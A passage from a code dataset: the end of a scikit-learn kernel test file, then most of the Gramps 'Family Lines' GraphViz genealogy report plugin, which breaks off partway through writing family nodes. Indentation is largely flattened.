assert_equal(K_gradient.shape[1], X.shape[0])
assert_equal(K_gradient.shape[2], kernel.theta.shape[0])
def eval_kernel_for_theta(theta):
kernel_clone = kernel.clone_with_theta(theta)
K = kernel_clone(X, eval_gradient=False)
return K
K_gradient_approx = \
_approx_fprime(kernel.theta, eval_kernel_for_theta, 1e-10)
assert_almost_equal(K_gradient, K_gradient_approx, 4)
def test_kernel_theta():
""" Check that parameter vector theta of kernel is set correctly. """
for kernel in kernels:
if isinstance(kernel, KernelOperator) \
or isinstance(kernel, Exponentiation): # skip non-basic kernels
continue
theta = kernel.theta
_, K_gradient = kernel(X, eval_gradient=True)
# Determine kernel parameters that contribute to theta
init_sign = signature(kernel.__class__.__init__).parameters.values()
args = [p.name for p in init_sign if p.name != 'self']
        # Strip the "_bounds" suffix by slicing; str.rstrip("_bounds") would
        # strip a trailing *character set*, not the suffix, and only works
        # here by accident
        theta_vars = map(lambda s: s[:-len("_bounds")],
                         filter(lambda s: s.endswith("_bounds"), args))
assert_equal(
set(hyperparameter.name
for hyperparameter in kernel.hyperparameters),
set(theta_vars))
# Check that values returned in theta are consistent with
# hyperparameter values (being their logarithms)
for i, hyperparameter in enumerate(kernel.hyperparameters):
assert_equal(theta[i],
np.log(getattr(kernel, hyperparameter.name)))
# Fixed kernel parameters must be excluded from theta and gradient.
for i, hyperparameter in enumerate(kernel.hyperparameters):
# create copy with certain hyperparameter fixed
params = kernel.get_params()
params[hyperparameter.name + "_bounds"] = "fixed"
kernel_class = kernel.__class__
new_kernel = kernel_class(**params)
# Check that theta and K_gradient are identical with the fixed
# dimension left out
_, K_gradient_new = new_kernel(X, eval_gradient=True)
assert_equal(theta.shape[0], new_kernel.theta.shape[0] + 1)
assert_equal(K_gradient.shape[2], K_gradient_new.shape[2] + 1)
if i > 0:
assert_equal(theta[:i], new_kernel.theta[:i])
assert_array_equal(K_gradient[..., :i],
K_gradient_new[..., :i])
if i + 1 < len(kernel.hyperparameters):
assert_equal(theta[i + 1:], new_kernel.theta[i:])
assert_array_equal(K_gradient[..., i + 1:],
K_gradient_new[..., i:])
# Check that values of theta are modified correctly
for i, hyperparameter in enumerate(kernel.hyperparameters):
theta[i] = np.log(42)
kernel.theta = theta
assert_almost_equal(getattr(kernel, hyperparameter.name), 42)
setattr(kernel, hyperparameter.name, 43)
assert_almost_equal(kernel.theta[i], np.log(43))
def test_auto_vs_cross():
""" Auto-correlation and cross-correlation should be consistent. """
for kernel in kernels:
if kernel == kernel_white:
continue # Identity is not satisfied on diagonal
K_auto = kernel(X)
K_cross = kernel(X, X)
assert_almost_equal(K_auto, K_cross, 5)
def test_kernel_diag():
""" Test that diag method of kernel returns consistent results. """
for kernel in kernels:
K_call_diag = np.diag(kernel(X))
K_diag = kernel.diag(X)
assert_almost_equal(K_call_diag, K_diag, 5)
def test_kernel_operator_commutative():
""" Adding kernels and multiplying kernels should be commutative. """
# Check addition
assert_almost_equal((RBF(2.0) + 1.0)(X),
(1.0 + RBF(2.0))(X))
# Check multiplication
assert_almost_equal((3.0 * RBF(2.0))(X),
(RBF(2.0) * 3.0)(X))
def test_kernel_anisotropic():
""" Anisotropic kernel should be consistent with isotropic kernels."""
kernel = 3.0 * RBF([0.5, 2.0])
K = kernel(X)
X1 = np.array(X)
X1[:, 0] *= 4
K1 = 3.0 * RBF(2.0)(X1)
assert_almost_equal(K, K1)
X2 = np.array(X)
X2[:, 1] /= 4
K2 = 3.0 * RBF(0.5)(X2)
assert_almost_equal(K, K2)
# Check getting and setting via theta
kernel.theta = kernel.theta + np.log(2)
assert_array_equal(kernel.theta, np.log([6.0, 1.0, 4.0]))
assert_array_equal(kernel.k2.length_scale, [1.0, 4.0])
def test_kernel_stationary():
""" Test stationarity of kernels."""
for kernel in kernels:
if not kernel.is_stationary():
continue
K = kernel(X, X + 1)
assert_almost_equal(K[0, 0], np.diag(K))
def test_kernel_clone():
""" Test that sklearn's clone works correctly on kernels. """
for kernel in kernels:
kernel_cloned = clone(kernel)
assert_equal(kernel, kernel_cloned)
assert_not_equal(id(kernel), id(kernel_cloned))
for attr in kernel.__dict__.keys():
attr_value = getattr(kernel, attr)
attr_value_cloned = getattr(kernel_cloned, attr)
if attr.startswith("hyperparameter_"):
assert_equal(attr_value.name, attr_value_cloned.name)
assert_equal(attr_value.value_type,
attr_value_cloned.value_type)
assert_array_equal(attr_value.bounds,
attr_value_cloned.bounds)
assert_equal(attr_value.n_elements,
attr_value_cloned.n_elements)
elif np.iterable(attr_value):
for i in range(len(attr_value)):
if np.iterable(attr_value[i]):
assert_array_equal(attr_value[i],
attr_value_cloned[i])
else:
assert_equal(attr_value[i], attr_value_cloned[i])
else:
assert_equal(attr_value, attr_value_cloned)
if not isinstance(attr_value, Hashable):
# modifiable attributes must not be identical
assert_not_equal(id(attr_value), id(attr_value_cloned))
def test_matern_kernel():
""" Test consistency of Matern kernel for special values of nu. """
K = Matern(nu=1.5, length_scale=1.0)(X)
# the diagonal elements of a matern kernel are 1
assert_array_almost_equal(np.diag(K), np.ones(X.shape[0]))
    # matern kernel for nu==0.5 is equal to absolute exponential kernel
K_absexp = np.exp(-euclidean_distances(X, X, squared=False))
K = Matern(nu=0.5, length_scale=1.0)(X)
assert_array_almost_equal(K, K_absexp)
    # test that special cases of the matern kernel (nu in [0.5, 1.5, 2.5])
    # give nearly identical results to the general case for nu in
    # [0.5 + tiny, 1.5 + tiny, 2.5 + tiny]
tiny = 1e-10
for nu in [0.5, 1.5, 2.5]:
K1 = Matern(nu=nu, length_scale=1.0)(X)
K2 = Matern(nu=nu + tiny, length_scale=1.0)(X)
assert_array_almost_equal(K1, K2)
def test_kernel_versus_pairwise():
"""Check that GP kernels can also be used as pairwise kernels."""
for kernel in kernels:
# Test auto-kernel
if kernel != kernel_white:
# For WhiteKernel: k(X) != k(X,X). This is assumed by
# pairwise_kernels
K1 = kernel(X)
K2 = pairwise_kernels(X, metric=kernel)
assert_array_almost_equal(K1, K2)
# Test cross-kernel
K1 = kernel(X, Y)
K2 = pairwise_kernels(X, Y, metric=kernel)
assert_array_almost_equal(K1, K2)
def test_set_get_params():
"""Check that set_params()/get_params() is consistent with kernel.theta."""
for kernel in kernels:
# Test get_params()
index = 0
params = kernel.get_params()
for hyperparameter in kernel.hyperparameters:
            if hyperparameter.bounds == "fixed":
continue
size = hyperparameter.n_elements
if size > 1: # anisotropic kernels
assert_almost_equal(np.exp(kernel.theta[index:index + size]),
params[hyperparameter.name])
index += size
else:
assert_almost_equal(np.exp(kernel.theta[index]),
params[hyperparameter.name])
index += 1
# Test set_params()
index = 0
value = 10 # arbitrary value
for hyperparameter in kernel.hyperparameters:
            if hyperparameter.bounds == "fixed":
continue
size = hyperparameter.n_elements
if size > 1: # anisotropic kernels
kernel.set_params(**{hyperparameter.name: [value] * size})
assert_almost_equal(np.exp(kernel.theta[index:index + size]),
[value] * size)
index += size
else:
kernel.set_params(**{hyperparameter.name: value})
assert_almost_equal(np.exp(kernel.theta[index]), value)
index += 1
|
DailyActie/Surrogate-Model
|
01-codes/scikit-learn-master/sklearn/gaussian_process/tests/test_kernels.py
|
Python
|
mit
| 11,615
|
[
"Gaussian"
] |
6cbe372ddbcb0cb334ca29bcd142571d8888e69ef1caa6bcda06f17e893d1405
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2007-2008 Stephane Charette
# Copyright (C) 2007-2008 Brian G. Matherly
# Copyright (C) 2009-2010 Gary Burton
# Contribution 2009 by Bob Ham <rah@bash.sh>
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2011 Paul Franklin
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"""
Family Lines, a GraphViz-based plugin for Gramps.
"""
from __future__ import unicode_literals
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
from functools import partial
#------------------------------------------------------------------------
#
# Set up logging
#
#------------------------------------------------------------------------
import logging
log = logging.getLogger(".FamilyLines")
#------------------------------------------------------------------------
#
# GRAMPS module
#
#------------------------------------------------------------------------
from gramps.gen.lib import EventRoleType, EventType, Person
from gramps.gen.utils.file import media_path_full
from gramps.gui.thumbnails import get_thumbnail_path
from gramps.gen.datehandler import displayer as _dd
from gramps.gen.plug.report import Report
from gramps.gen.plug.report import utils as ReportUtils
from gramps.gen.plug.report import MenuReportOptions
from gramps.gen.plug.menu import (NumberOption, ColorOption, BooleanOption,
EnumeratedListOption, PersonListOption,
SurnameColorOption)
from gramps.gen.utils.db import get_birth_or_fallback, get_death_or_fallback
from gramps.gen.display.name import displayer as name_displayer
#------------------------------------------------------------------------
#
# Constant options items
#
#------------------------------------------------------------------------
_COLORS = [ { 'name' : _("B&W outline"), 'value' : "outline" },
{ 'name' : _("Colored outline"), 'value' : "colored" },
{ 'name' : _("Color fill"), 'value' : "filled" }]
#------------------------------------------------------------------------
#
# A quick overview of the classes we'll be using:
#
# class FamilyLinesOptions(MenuReportOptions)
# - this class is created when the report dialog comes up
# - all configuration controls for the report are created here
# - see src/ReportBase/_ReportOptions.py for more information
#
# class FamilyLinesReport(Report)
# - this class is created only after the user clicks on "OK"
# - the actual report generation is done by this class
# - see src/ReportBase/_Report.py for more information
#
# Likely to be of additional interest is register_report() at the
# very bottom of this file.
#
#------------------------------------------------------------------------
class FamilyLinesOptions(MenuReportOptions):
"""
Defines all of the controls necessary
to configure the FamilyLines reports.
"""
def __init__(self, name, dbase):
self.limit_parents = None
self.max_parents = None
self.limit_children = None
self.max_children = None
self.include_images = None
self.image_location = None
MenuReportOptions.__init__(self, name, dbase)
def add_menu_options(self, menu):
# --------------------------------
add_option = partial(menu.add_option, _('People of Interest'))
# --------------------------------
person_list = PersonListOption(_('People of interest'))
person_list.set_help(_('People of interest are used as a starting '
'point when determining "family lines".'))
add_option('gidlist', person_list)
followpar = BooleanOption(
_('Follow parents to determine family lines'), True)
followpar.set_help(_('Parents and their ancestors will be '
'considered when determining "family lines".'))
add_option('followpar', followpar)
followchild = BooleanOption(_('Follow children to determine '
'"family lines"'), True)
followchild.set_help(_('Children will be considered when '
'determining "family lines".'))
add_option('followchild', followchild)
remove_extra_people = BooleanOption(
_('Try to remove extra people and families'), True)
remove_extra_people.set_help(_('People and families not directly '
'related to people of interest will '
'be removed when determining '
'"family lines".'))
add_option('removeextra', remove_extra_people)
# ----------------------------
add_option = partial(menu.add_option, _('Family Colors'))
# ----------------------------
surname_color = SurnameColorOption(_('Family colors'))
surname_color.set_help(_('Colors to use for various family lines.'))
add_option('surnamecolors', surname_color)
# -------------------------
add_option = partial(menu.add_option, _('Individuals'))
# -------------------------
color_males = ColorOption(_('Males'), '#e0e0ff')
color_males.set_help(_('The color to use to display men.'))
add_option('colormales', color_males)
color_females = ColorOption(_('Females'), '#ffe0e0')
color_females.set_help(_('The color to use to display women.'))
add_option('colorfemales', color_females)
color_unknown = ColorOption(_('Unknown'), '#e0e0e0')
color_unknown.set_help(_('The color to use '
'when the gender is unknown.'))
add_option('colorunknown', color_unknown)
color_family = ColorOption(_('Families'), '#ffffe0')
color_family.set_help(_('The color to use to display families.'))
add_option('colorfamilies', color_family)
self.limit_parents = BooleanOption(_('Limit the number of ancestors'),
False)
self.limit_parents.set_help(_('Whether to '
'limit the number of ancestors.'))
add_option('limitparents', self.limit_parents)
self.limit_parents.connect('value-changed', self.limit_changed)
self.max_parents = NumberOption('', 50, 10, 9999)
self.max_parents.set_help(_('The maximum number '
'of ancestors to include.'))
add_option('maxparents', self.max_parents)
self.limit_children = BooleanOption(_('Limit the number '
'of descendants'),
False)
self.limit_children.set_help(_('Whether to '
'limit the number of descendants.'))
add_option('limitchildren', self.limit_children)
self.limit_children.connect('value-changed', self.limit_changed)
self.max_children = NumberOption('', 50, 10, 9999)
self.max_children.set_help(_('The maximum number '
'of descendants to include.'))
add_option('maxchildren', self.max_children)
# --------------------
add_option = partial(menu.add_option, _('Images'))
# --------------------
self.include_images = BooleanOption(_('Include '
'thumbnail images of people'),
True)
self.include_images.set_help(_('Whether to '
'include thumbnail images of people.'))
add_option('incimages', self.include_images)
self.include_images.connect('value-changed', self.images_changed)
self.image_location = EnumeratedListOption(_('Thumbnail location'), 0)
self.image_location.add_item(0, _('Above the name'))
self.image_location.add_item(1, _('Beside the name'))
self.image_location.set_help(_('Where the thumbnail image '
'should appear relative to the name'))
add_option('imageonside', self.image_location)
# ---------------------
add_option = partial(menu.add_option, _('Options'))
# ---------------------
color = EnumeratedListOption(_("Graph coloring"), "filled")
for i in range(len(_COLORS)):
color.add_item(_COLORS[i]["value"], _COLORS[i]["name"])
color.set_help(_("Males will be shown with blue, females "
"with red, unless otherwise set above for filled. "
"If the sex of an individual "
"is unknown it will be shown with gray."))
add_option("color", color)
use_roundedcorners = BooleanOption(_('Use rounded corners'), False)
use_roundedcorners.set_help(_('Use rounded corners to differentiate '
'between women and men.'))
add_option("useroundedcorners", use_roundedcorners)
self.include_dates = BooleanOption(_('Include dates'), True)
self.include_dates.set_help(_('Whether to include dates for people '
'and families.'))
add_option('incdates', self.include_dates)
self.include_dates.connect('value-changed', self.include_dates_changed)
self.justyears = BooleanOption(_("Limit dates to years only"), False)
        self.justyears.set_help(_("Prints just the year of each date; "
                                  "month, day, approximations and "
                                  "intervals are not shown."))
add_option("justyears", self.justyears)
include_places = BooleanOption(_('Include places'), True)
include_places.set_help(_('Whether to include placenames for people '
'and families.'))
add_option('incplaces', include_places)
include_num_children = BooleanOption(
_('Include the number of children'), True)
include_num_children.set_help(_('Whether to include the number of '
'children for families with more '
'than 1 child.'))
add_option('incchildcnt', include_num_children)
include_private = BooleanOption(_('Include private records'), False)
include_private.set_help(_('Whether to include names, dates, and '
'families that are marked as private.'))
add_option('incprivate', include_private)
self.limit_changed()
self.images_changed()
def limit_changed(self):
"""
Handle the change of limiting parents and children.
"""
self.max_parents.set_available(self.limit_parents.get_value())
self.max_children.set_available(self.limit_children.get_value())
def images_changed(self):
"""
Handle the change of including images.
"""
self.image_location.set_available(self.include_images.get_value())
def include_dates_changed(self):
"""
Enable/disable menu items if dates are required
"""
if self.include_dates.get_value():
self.justyears.set_available(True)
else:
self.justyears.set_available(False)
#------------------------------------------------------------------------
#
# FamilyLinesReport -- created once the user presses 'OK'
#
#------------------------------------------------------------------------
class FamilyLinesReport(Report):
def __init__(self, database, options, user):
"""
Create FamilyLinesReport object that eventually produces the report.
The arguments are:
database - the GRAMPS database instance
options - instance of the FamilyLinesOptions class for this report
user - a gen.user.User() instance
"""
Report.__init__(self, database, options, user)
# initialize several convenient variables
self._db = database
self._people = set() # handle of people we need in the report
self._families = set() # handle of families we need in the report
self._deleted_people = 0
self._deleted_families = 0
self._user = user
menu = options.menu
get_option_by_name = menu.get_option_by_name
get_value = lambda name: get_option_by_name(name).get_value()
self._followpar = get_value('followpar')
self._followchild = get_value('followchild')
self._removeextra = get_value('removeextra')
self._gidlist = get_value('gidlist')
self._colormales = get_value('colormales')
self._colorfemales = get_value('colorfemales')
self._colorunknown = get_value('colorunknown')
self._colorfamilies = get_value('colorfamilies')
self._limitparents = get_value('limitparents')
self._maxparents = get_value('maxparents')
self._limitchildren = get_value('limitchildren')
self._maxchildren = get_value('maxchildren')
self._incimages = get_value('incimages')
self._imageonside = get_value('imageonside')
self._useroundedcorners = get_value('useroundedcorners')
self._usesubgraphs = get_value('usesubgraphs')
self._incdates = get_value('incdates')
self._just_years = get_value('justyears')
self._incplaces = get_value('incplaces')
self._incchildcount = get_value('incchildcnt')
self._incprivate = get_value('incprivate')
# the gidlist is annoying for us to use since we always have to convert
# the GIDs to either Person or to handles, so we may as well convert the
# entire list right now and not have to deal with it ever again
self._interest_set = set()
if not self._gidlist:
self._user.warn(_('Empty report'),
_('You did not specify anybody'))
for gid in self._gidlist.split():
person = self._db.get_person_from_gramps_id(gid)
if person:
#option can be from another family tree, so person can be None
self._interest_set.add(person.get_handle())
# convert the 'surnamecolors' string to a dictionary of names and colors
self._surnamecolors = {}
tmp = get_value('surnamecolors')
if (tmp.find('\xb0') >= 0):
tmp = tmp.split('\xb0') # new style delimiter (see bug report #2162)
else:
tmp = tmp.split(' ') # old style delimiter
while len(tmp) > 1:
surname = tmp.pop(0).encode('iso-8859-1', 'xmlcharrefreplace')
colour = tmp.pop(0)
self._surnamecolors[surname] = colour
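        # For example (illustrative values), the new-style string
        # 'Smith\xb0#ff0000\xb0Jones\xb0#0000ff' would yield
        # {'Smith': '#ff0000', 'Jones': '#0000ff'}, with the surnames
        # iso-8859-1 encoded as above.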
self._colorize = get_value('color')
def begin_report(self):
"""
Inherited method; called by report() in _ReportDialog.py
This is where we'll do all of the work of figuring out who
from the database is going to be output into the report
"""
# starting with the people of interest, we then add parents:
self._people.clear()
self._families.clear()
if self._followpar:
self.findParents()
if self._removeextra:
self.removeUninterestingParents()
# ...and/or with the people of interest we add their children:
if self._followchild:
self.findChildren()
# once we get here we have a full list of people
# and families that we need to generate a report
def write_report(self):
"""
Inherited method; called by report() in _ReportDialog.py
"""
# now that begin_report() has done the work, output what we've
# obtained into whatever file or format the user expects to use
self.doc.add_comment('# Number of people in database: %d'
% self._db.get_number_of_people())
self.doc.add_comment('# Number of people of interest: %d'
% len(self._people))
self.doc.add_comment('# Number of families in database: %d'
% self._db.get_number_of_families())
self.doc.add_comment('# Number of families of interest: %d'
% len(self._families))
if self._removeextra:
self.doc.add_comment('# Additional people removed: %d'
% self._deleted_people)
self.doc.add_comment('# Additional families removed: %d'
% self._deleted_families)
self.doc.add_comment('# Initial list of people of interest:')
for handle in self._interest_set:
person = self._db.get_person_from_handle(handle)
gid = person.get_gramps_id()
name = person.get_primary_name().get_regular_name()
self.doc.add_comment('# -> %s, %s' % (gid, name))
self.writePeople()
self.writeFamilies()
def findParents(self):
# we need to start with all of our "people of interest"
ancestorsNotYetProcessed = set(self._interest_set)
# now we find all the immediate ancestors of our people of interest
while ancestorsNotYetProcessed:
handle = ancestorsNotYetProcessed.pop()
# One of 2 things can happen here:
# 1) we've already know about this person and he/she is already
# in our list
# 2) this is someone new, and we need to remember him/her
#
# In the first case, there isn't anything else to do, so we simply
# go back to the top and pop the next person off the list.
#
# In the second case, we need to add this person to our list, and
# then go through all of the parents this person has to find more
# people of interest.
if handle not in self._people:
person = self._db.get_person_from_handle(handle)
# if this is a private record, and we're not
# including private records, then go back to the
# top of the while loop to get the next person
if person.private and not self._incprivate:
continue
# remember this person!
self._people.add(handle)
# see if a family exists between this person and someone else
# we have on our list of people we're going to output -- if
# there is a family, then remember it for when it comes time
# to link spouses together
for family_handle in person.get_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
spouse_handle = ReportUtils.find_spouse(person, family)
if spouse_handle:
if (spouse_handle in self._people or
spouse_handle in ancestorsNotYetProcessed):
self._families.add(family_handle)
# if we have a limit on the number of people, and we've
# reached that limit, then don't attempt to find any
# more ancestors
if self._limitparents and (self._maxparents <
len(ancestorsNotYetProcessed) + len(self._people)):
# get back to the top of the while loop so we can finish
# processing the people queued up in the "not yet
# processed" list
continue
# queue the parents of the person we're processing
for family_handle in person.get_parent_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
if not family.private or self._incprivate:
father = self._db.get_person_from_handle(
family.get_father_handle())
mother = self._db.get_person_from_handle(
family.get_mother_handle())
if father:
if not father.private or self._incprivate:
ancestorsNotYetProcessed.add(
family.get_father_handle())
self._families.add(family_handle)
if mother:
if not mother.private or self._incprivate:
ancestorsNotYetProcessed.add(
family.get_mother_handle())
self._families.add(family_handle)
def removeUninterestingParents(self):
# start with all the people we've already identified
unprocessed_parents = set(self._people)
while len(unprocessed_parents) > 0:
handle = unprocessed_parents.pop()
person = self._db.get_person_from_handle(handle)
# There are a few things we're going to need,
# so look it all up right now; such as:
# - who is the child?
# - how many children?
# - parents?
# - spouse?
# - is a person of interest?
# - spouse of a person of interest?
# - same surname as a person of interest?
# - spouse has the same surname as a person of interest?
child_handle = None
child_count = 0
spouse_handle = None
spouse_count = 0
father_handle = None
mother_handle = None
spouse_father_handle = None
spouse_mother_handle = None
spouse_surname = ""
surname = person.get_primary_name().get_surname()
surname = surname.encode('iso-8859-1','xmlcharrefreplace')
# first we get the person's father and mother
for family_handle in person.get_parent_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
handle = family.get_father_handle()
if handle in self._people:
father_handle = handle
handle = family.get_mother_handle()
if handle in self._people:
mother_handle = handle
# now see how many spouses this person has
for family_handle in person.get_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
handle = ReportUtils.find_spouse(person, family)
if handle in self._people:
spouse_count += 1
spouse = self._db.get_person_from_handle(handle)
spouse_handle = handle
spouse_surname = spouse.get_primary_name().get_surname()
spouse_surname = spouse_surname.encode(
'iso-8859-1', 'xmlcharrefreplace'
)
# see if the spouse has parents
if not spouse_father_handle and not spouse_mother_handle:
for family_handle in \
spouse.get_parent_family_handle_list():
family = self._db.get_family_from_handle(
family_handle)
handle = family.get_father_handle()
if handle in self._people:
spouse_father_handle = handle
handle = family.get_mother_handle()
if handle in self._people:
spouse_mother_handle = handle
# get the number of children that we think might be interesting
for family_handle in person.get_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
for child_ref in family.get_child_ref_list():
if child_ref.ref in self._people:
child_count += 1
child_handle = child_ref.ref
# we now have everything we need -- start looking for reasons
# why this is a person we need to keep in our list, and loop
# back to the top as soon as a reason is discovered
# if this person has many children of interest, then we
# automatically keep this person
if child_count > 1:
continue
# if this person has many spouses of interest, then we
# automatically keep this person
if spouse_count > 1:
continue
# if this person has parents, then we automatically keep
# this person
if father_handle is not None or mother_handle is not None:
continue
# if the spouse has parents, then we automatically keep
# this person
if spouse_father_handle is not None or spouse_mother_handle is not None:
continue
# if this is a person of interest, then we automatically keep
if person.get_handle() in self._interest_set:
continue
# if the spouse is a person of interest, then we keep
if spouse_handle in self._interest_set:
continue
# if the surname (or the spouse's surname) matches a person
# of interest, then we automatically keep this person
bKeepThisPerson = False
for personOfInterestHandle in self._interest_set:
personOfInterest = self._db.get_person_from_handle(personOfInterestHandle)
surnameOfInterest = personOfInterest.get_primary_name().get_surname().encode('iso-8859-1','xmlcharrefreplace')
if surnameOfInterest == surname or surnameOfInterest == spouse_surname:
bKeepThisPerson = True
break
if bKeepThisPerson:
continue
# if we have a special colour to use for this person,
# then we automatically keep this person
if surname in self._surnamecolors:
continue
# if we have a special colour to use for the spouse,
# then we automatically keep this person
if spouse_surname in self._surnamecolors:
continue
# took us a while, but if we get here, then we can remove this person
self._deleted_people += 1
self._people.remove(person.get_handle())
# we can also remove any families to which this person belonged
for family_handle in person.get_family_handle_list():
if family_handle in self._families:
self._deleted_families += 1
self._families.remove(family_handle)
# if we have a spouse, then ensure we queue up the spouse
if spouse_handle:
if spouse_handle not in unprocessed_parents:
unprocessed_parents.add(spouse_handle)
# if we have a child, then ensure we queue up the child
if child_handle:
if child_handle not in unprocessed_parents:
unprocessed_parents.add(child_handle)
def findChildren(self):
# we need to start with all of our "people of interest"
childrenNotYetProcessed = set(self._interest_set)
childrenToInclude = set()
# now we find all the children of our people of interest
while len(childrenNotYetProcessed) > 0:
handle = childrenNotYetProcessed.pop()
if handle not in childrenToInclude:
person = self._db.get_person_from_handle(handle)
# if this is a private record, and we're not
# including private records, then go back to the
# top of the while loop to get the next person
if person.private and not self._incprivate:
continue
# remember this person!
childrenToInclude.add(handle)
# if we have a limit on the number of people, and we've
# reached that limit, then don't attempt to find any
# more children
if self._limitchildren and (
self._maxchildren < (
len(childrenNotYetProcessed) + len(childrenToInclude)
)
):
# get back to the top of the while loop so we can finish
# processing the people queued up in the "not yet processed" list
continue
# iterate through this person's families
for family_handle in person.get_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
                    if not family.private or self._incprivate:
# queue up any children from this person's family
for childRef in family.get_child_ref_list():
child = self._db.get_person_from_handle(childRef.ref)
                            if not child.private or self._incprivate:
childrenNotYetProcessed.add(child.get_handle())
self._families.add(family_handle)
# include the spouse from this person's family
spouse_handle = ReportUtils.find_spouse(person, family)
if spouse_handle:
spouse = self._db.get_person_from_handle(spouse_handle)
                            if not spouse.private or self._incprivate:
childrenToInclude.add(spouse_handle)
self._families.add(family_handle)
# we now merge our temp set "childrenToInclude" into our master set
self._people.update(childrenToInclude)
def writePeople(self):
self.doc.add_comment('')
# If we're going to attempt to include images, then use the HTML style
# of .gv file.
bUseHtmlOutput = False
if self._incimages:
bUseHtmlOutput = True
# loop through all the people we need to output
for handle in self._people:
person = self._db.get_person_from_handle(handle)
name = name_displayer.display_name(person.get_primary_name())
# figure out what colour to use
gender = person.get_gender()
colour = self._colorunknown
if gender == Person.MALE:
colour = self._colormales
elif gender == Person.FEMALE:
colour = self._colorfemales
# see if we have surname colours that match this person
surname = person.get_primary_name().get_surname().encode('iso-8859-1','xmlcharrefreplace')
if surname in self._surnamecolors:
colour = self._surnamecolors[surname]
# see if we have a birth/death or fallback dates we can use
if self._incdates or self._incplaces:
bth_event = get_birth_or_fallback(self._db, person)
dth_event = get_death_or_fallback(self._db, person)
else:
bth_event = None
dth_event = None
# output the birth or fallback event
birthStr = None
if bth_event and self._incdates:
if not bth_event.private or self._incprivate:
date = bth_event.get_date_object()
if self._just_years and date.get_year_valid():
birthStr = '%i' % date.get_year()
else:
birthStr = _dd.display(date)
# get birth place (one of: city, state, or country) we can use
birthplace = None
if bth_event and self._incplaces:
if not bth_event.private or self._incprivate:
place = self._db.get_place_from_handle(bth_event.get_place_handle())
if place:
location = place.get_main_location()
                        if location.get_city():
                            birthplace = location.get_city()
                        elif location.get_state():
                            birthplace = location.get_state()
                        elif location.get_country():
                            birthplace = location.get_country()
# see if we have a deceased date we can use
deathStr = None
if dth_event and self._incdates:
if not dth_event.private or self._incprivate:
date = dth_event.get_date_object()
if self._just_years and date.get_year_valid():
deathStr = '%i' % date.get_year()
else:
deathStr = _dd.display(date)
# get death place (one of: city, state, or country) we can use
deathplace = None
if dth_event and self._incplaces:
if not dth_event.private or self._incprivate:
place = self._db.get_place_from_handle(dth_event.get_place_handle())
if place:
location = place.get_main_location()
                        if location.get_city():
                            deathplace = location.get_city()
                        elif location.get_state():
                            deathplace = location.get_state()
                        elif location.get_country():
                            deathplace = location.get_country()
# see if we have an image to use for this person
imagePath = None
if self._incimages:
mediaList = person.get_media_list()
if len(mediaList) > 0:
mediaHandle = mediaList[0].get_reference_handle()
media = self._db.get_object_from_handle(mediaHandle)
mediaMimeType = media.get_mime_type()
if mediaMimeType[0:5] == "image":
imagePath = get_thumbnail_path(
media_path_full(self._db,
media.get_path()),
rectangle=mediaList[0].get_rectangle())
# put the label together and output this person
label = ""
lineDelimiter = '\\n'
if bUseHtmlOutput:
lineDelimiter = '<BR/>'
# if we have an image, then start an HTML table; remember to close the table afterwards!
if imagePath:
label = ('<TABLE BORDER="0" CELLSPACING="2" CELLPADDING="0" '
'CELLBORDER="0"><TR><TD><IMG SRC="%s"/></TD>'
% imagePath
)
if self._imageonside == 0:
label += '</TR><TR>'
label += '<TD>'
# at the very least, the label must have the person's name
label += name
if birthStr or deathStr:
label += ' %s(' % lineDelimiter
if birthStr:
label += '%s' % birthStr
label += ' - '
if deathStr:
label += '%s' % deathStr
label += ')'
if birthplace or deathplace:
if birthplace == deathplace:
deathplace = None # no need to print the same name twice
label += ' %s' % lineDelimiter
if birthplace:
label += '%s' % birthplace
if birthplace and deathplace:
label += ' / '
if deathplace:
label += '%s' % deathplace
# see if we have a table that needs to be terminated
if imagePath:
label += '</TD></TR></TABLE>'
shape = "box"
style = "solid"
border = colour
fill = colour
# do not use colour if this is B&W outline
if self._colorize == 'outline':
border = ""
fill = ""
        if gender == Person.FEMALE and self._useroundedcorners:
            style = "rounded"
        elif gender == Person.UNKNOWN:
shape = "hexagon"
# if we're filling the entire node:
if self._colorize == 'filled':
style += ",filled"
border = ""
# we're done -- add the node
self.doc.add_node(person.get_gramps_id(),
label=label,
shape=shape,
color=border,
style=style,
fillcolor=fill,
htmloutput=bUseHtmlOutput)
def writeFamilies(self):
self.doc.add_comment('')
# loop through all the families we need to output
for family_handle in self._families:
family = self._db.get_family_from_handle(family_handle)
fgid = family.get_gramps_id()
# figure out a wedding date or placename we can use
weddingDate = None
weddingPlace = None
if self._incdates or self._incplaces:
for event_ref in family.get_event_ref_list():
event = self._db.get_event_from_handle(event_ref.ref)
if event.get_type() == EventType.MARRIAGE and \
(event_ref.get_role() == EventRoleType.FAMILY or
event_ref.get_role() == EventRoleType.PRIMARY ):
# get the wedding date
if (event.private and self._incprivate) or not event.private:
if self._incdates:
date = event.get_date_object()
if self._just_years and date.get_year_valid():
weddingDate = '%i' % date.get_year()
else:
weddingDate = _dd.display(date)
# get the wedding location
if self._incplaces:
place = self._db.get_place_from_handle(event.get_place_handle())
if place:
location = place.get_main_location()
                            if location.get_city():
                                weddingPlace = location.get_city()
                            elif location.get_state():
                                weddingPlace = location.get_state()
                            elif location.get_country():
                                weddingPlace = location.get_country()
break
# figure out the number of children (if any)
childrenStr = None
if self._incchildcount:
child_count = len(family.get_child_ref_list())
# if child_count == 1:
# childrenStr = _('1 child')
if child_count > 1:
childrenStr = _('%d children') % child_count
label = ''
if weddingDate:
if label != '':
label += '\\n'
label += '%s' % weddingDate
